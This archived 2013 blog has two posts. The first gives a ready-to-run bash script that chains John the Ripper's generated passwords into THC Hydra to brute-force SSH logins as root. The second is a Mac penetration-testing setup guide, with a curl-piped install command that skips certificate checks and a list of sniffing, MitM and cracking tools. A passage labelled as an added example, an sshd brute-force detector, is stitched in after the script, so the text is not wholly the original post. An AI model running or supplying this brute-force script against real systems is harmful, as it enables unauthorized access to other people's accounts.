Friday, June 21, 2013

I hate downloading WordLists



1. Introduction

You most definitely know of THC Hydra ... well, I love the tool; problem is ... Hydra doesn't digest huge lists of passwords. The reason is that Hydra will first try to load your password file into memory (RAM) before starting the brute-force attack. And so you are limited by your memory size, plus I hate downloading the darn wordlists or dictionaries. Well, why... takes too much time, changes every now and then... and my internet speed sometimes sucks, and the bundles, lord, the bundles..... so here is my tune-up.... why don't we use two tools:

HYDRA and John The Ripper

It's OK with a usual password dictionary, but you could want more. Something like a password list generated by "John the Ripper" (John provides great ways to generate passwords: digit/alpha/special chars only, "rules" options, "external" filters, etc.)

Our goal is to use the output of John the ripper with Hydra.

The method is trivial but does the job.

loop

(1) Generate random passwords with John the Ripper into a file for a few seconds (the file grows very quickly).

Keep John's session file.

(2) Run Hydra with the password file.

(3) If found, exit. If not, continue the session created in (1).

end loop



2. The script

This is the bash script I wrote to perform the task.

· Review the 'hydra_*' variables (if needed, run 'hydra --help'). See: 'hydra_host', 'hydra_port', 'hydra_module', ... and maybe 'hydra_all_params'.

· Review the 'john_*' variables. See: 'john_all_params' and choose your template (--incremental:All, --incremental:Digits, --incremental:Alpha, --single, --rules ...); see the john.conf file to get the list.

Enjoy!

Get hydra-john.sh

#!/bin/sh

hydra="/usr/local/bin/hydra"
john="/usr/bin/john"

hydra_module="ssh2"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns"

john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20 # time (seconds) to let john generate candidates per round

tmp_passwd="/tmp/pwd1234.tmp" # candidate passwords for the current round
hydra_logfile="/tmp/hydralog"

if [ -z "$john_sessionfile" ]; then
  echo "Usage: $0 <john session file>"
  exit 1
fi

while true; do
  # generate some passwords with john the ripper
  echo; echo "- Start (re)generating passwords with John"
  if [ -e "$john_sessionfile.rec" ]; then
    # session exists: resume it where the previous round was stopped
    "$john" --restore="$john_sessionfile" > "$tmp_passwd" &
  else
    # no session yet: create it
    "$john" $john_all_params --session="$john_sessionfile" > "$tmp_passwd" &
  fi
  john_pid=$!

  # wait $john_time_step seconds, then stop john and run hydra on its output
  echo "- Wait ..."
  sleep "$john_time_step"
  echo "- Kill john"
  # stop only the john we started (killall would also hit unrelated john processes)
  kill "$john_pid" 2>/dev/null
  wait "$john_pid" 2>/dev/null
  sleep 1

  # start hydra
  echo; echo "- Start hydra"; echo
  rm -f "$hydra_logfile"
  echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
  "$hydra" -l root -P "$tmp_passwd" $hydra_all_params "$hydra_host" "$hydra_module" | tee -a "$hydra_logfile"

  # if a valid pair has been found, stop the loop
  # (the result line names the module; "[DATA]" status lines also do, so drop them)
  if [ -n "$(grep "$hydra_module" "$hydra_logfile" | grep -v DATA)" ]; then
    echo; echo "FOUND !!"
    grep "$hydra_module" "$hydra_logfile" | grep -v DATA
    exit 0
  fi
done
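On the target side, the loop above leaves a very recognisable trace: Hydra with -t 10 tasks opens many SSH connections in parallel, and every guess that misses is a "Failed password" line in sshd's log. The following is an added example, not part of the post or of either tool, that flags any source producing a burst of such failures within one clock minute; the log lines and the function names (flag_bruteforce, demo) are constructed for the example.

```shell
#!/bin/sh
# Constructed sshd log excerpt (not taken from the post): one source hammers
# root over several parallel connections inside a couple of seconds, which is
# the shape a "-l root -t 10 -e ns" run leaves behind; another host has a
# single ordinary failed login followed by a successful one.
AUTH_LOG='Jun 21 10:00:01 host sshd[2311]: Failed password for root from 203.0.113.5 port 50122 ssh2
Jun 21 10:00:01 host sshd[2312]: Failed password for root from 203.0.113.5 port 50123 ssh2
Jun 21 10:00:02 host sshd[2313]: Failed password for root from 203.0.113.5 port 50124 ssh2
Jun 21 10:00:02 host sshd[2314]: Failed password for root from 203.0.113.5 port 50125 ssh2
Jun 21 10:00:03 host sshd[2315]: Failed password for root from 203.0.113.5 port 50126 ssh2
Jun 21 10:00:03 host sshd[2316]: Failed password for root from 203.0.113.5 port 50127 ssh2
Jun 21 10:05:17 host sshd[2402]: Failed password for alice from 198.51.100.7 port 41002 ssh2
Jun 21 10:05:25 host sshd[2403]: Accepted password for alice from 198.51.100.7 port 41003 ssh2'

# flag_bruteforce THRESHOLD: read syslog-format sshd lines on stdin and print
# "<failures> <source-ip> <HH:MM>" for every source that produced at least
# THRESHOLD failed password attempts within one clock minute.
flag_bruteforce() {
    awk -v thr="$1" '
    /Failed password for / {
        minute = substr($3, 1, 5)          # "HH:MM" of the syslog timestamp
        for (i = 1; i <= NF; i++)          # the source address follows "from"
            if ($i == "from") ip = $(i + 1)
        n[ip, minute]++
    }
    END {
        for (k in n) {
            split(k, p, SUBSEP)
            if (n[k] >= thr) print n[k], p[1], p[2]
        }
    }' | sort -rn
}

# demo: run the constructed excerpt through the detector with a threshold of 5;
# only the bursting source is reported, the single typo from alice is not.
demo() {
    printf '%s\n' "$AUTH_LOG" | flag_bruteforce 5
}

demo
```

A per-minute bucket misses a burst that straddles a minute boundary; a sliding window over the timestamps fixes that at the cost of more state in the awk script.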



Happy hunting ... oops, learning .... P.S. To check out this trick with a proxy (Tor), check this site... am here fuu








Mac OSX and penetration Testing



I'm a MacBook/Mac OS X user and I love pentesting ... problem is Mac doesn't have a pentest environment unless I do a VM with my FreeBSD with tools.... aside from that I love custom tools, so I also have custom tools, either by my hand or from others....




Setting up a Pen-Testing environment on your Mac

Download and install Xcode
Open Xcode > Preferences > Download > Install Command line tools

Open Terminal:
> java
Install it.

Install Homebrew (fuck macports)
> ruby -e "$(curl -fsSkL raw.github.com/mxcl/homebrew/go)"

Run Brew Doctor (you may need to fix the $PATH in your .bash_profile)
> brew doctor

Install nmap (nping ships with it), ruby and postgresql
> brew install nmap
> brew install ruby
> brew install postgresql (if you prefer mysql: brew install mysql)

Startup PGSQL
> initdb /usr/local/var/postgres
> createuser msf -P -h localhost
> createdb -O msf msf -h localhost

Install Metasploit gems
> gem install pg sqlite3 msgpack hpricot

Setup VNC Viewer for MSF
> echo '#!/usr/bin/env bash' >> /usr/local/bin/vncviewer
> echo open vnc://\$1 >> /usr/local/bin/vncviewer
> chmod +x /usr/local/bin/vncviewer

Install Metasploit (from repository)
Select the directory to install metasploit (ex: ~/tools)
> git clone git://github.com/rapid7/metasploit-framework.git

Additional Tools:
brew install dsniff (Password Sniffer)
brew install ettercap (MitM made easy)
brew install aircrack (Wifi Suite)
brew install john (John the Ripper)
brew install hydra (Brute Force Cracker)
brew install ophcrack (Rainbow Table Cracker)
brew install skipfish (WebApp Scanner)

"tcpdump" and "netcat" are pre-installed with OS X (don't overlook them)

Download and install BurpSuite free
http://www.portswigger.net/burp/download.html

ARCHIVED

:) No longer posting, all articles should be treated as archived and outdated